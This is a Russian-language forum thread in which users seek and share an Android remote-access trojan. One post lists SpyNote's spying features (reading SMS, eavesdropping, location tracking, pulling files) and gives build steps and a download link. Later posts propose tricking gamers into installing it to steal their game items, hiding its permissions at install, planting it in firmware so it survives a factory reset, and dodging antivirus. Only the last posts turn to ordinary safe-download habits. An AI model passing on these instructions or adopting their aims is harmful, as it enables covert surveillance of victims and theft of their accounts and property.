Приветствую всех, есть ли нормальный ратник или типо него на андроид? а то всё под винду, да под винду. кто нибудь может что посоветовать?
Возможности: Не требует Root прав Скачивание файлов с девайса Просмотр sms'ок Прослушка девайса Просмотр контактов Просмотр локации Терминал Билдер Инструкция к использованию: 1. Запускаем SpyNote.exe 2. Вписываем порт. У меня 1604 3. Тыкаем ОК 4. После того как вылезло окошко тыкаем на Tools-->Build 5. Вводим все что надо. Думаю здесь объяснять не надо 5. Нажимаем на Build в левом верхнем углу (Build-->Build >) Видео: Ссылка на скачивание: http://rgho.st/8ytrCJ6f5 Конкретно от себя могу добавить, что Ратник идет не на всех мобилах.У знакомого работало, а у меня выдавало ошибку...возможно я просто криво всё настроил.Если хоть немного знаком с программированием или хотя бы прогами, которые скрывают разрешения у вируса при установке на Ведро(это единственный минус данных вирусов на Андроиде, который я обнаружил), то тогда проблем не будет. П.С: если кому-то помог, то влепите спасибку пжл))
вообще можно заставить человека с хорошим инвентарем в кске/доте/тф установить и потом перекинуть все вещи на свой фэйк акк
Уберется, но есть одна тема, благодаря которой только после смены прошивки удалится Ратник - это сделать свою прошивку, либо модернизировать чужую и с помощью андроидовских прог и рут-прав добавить Ратник в системные приложения.Системки не удаляются после ресета
ооо топчик а надо бы сделать так чтобы антивирус не видел и усе окей просто какой то антивирус то увидет
Антивиры на мобиле - это фигня какая-то.Я конечно не видел, будет ли он ругаться на системное приложение, но точно знаю, что антивиры мало, кто ставит.Частая причина заключается в том, люди покупают такие телефоны, на которых без Рут-прав нельзя перенести приложения на карту памяти и в итоге просто пекутся за каждый мегабайт во внутренней памяти
ну лично я поставил AVG и рут права поставил без проблем да и вирусы чаще всего на пк делают по этому я не парюсь и это очень редко что на телефоны процентов 5 делают на телефоны хотя это тоже процент
По мне так на мобиле самый лучший антивирус - это человеческий мозг.Я качаю все приложения только с 4pda и Гугл Плэя.Всё, что качается само или предлагает скачать реклама, просто не открываю
А, ну с pdalife тоже качаю.Имею скромный список сайтов, с которых качаю приложения, ибо уже трижды приходилось до заводских всё сбрасывать из-за лагов или подозрительных процессов, которые после выключения всё равно включались и не удалялись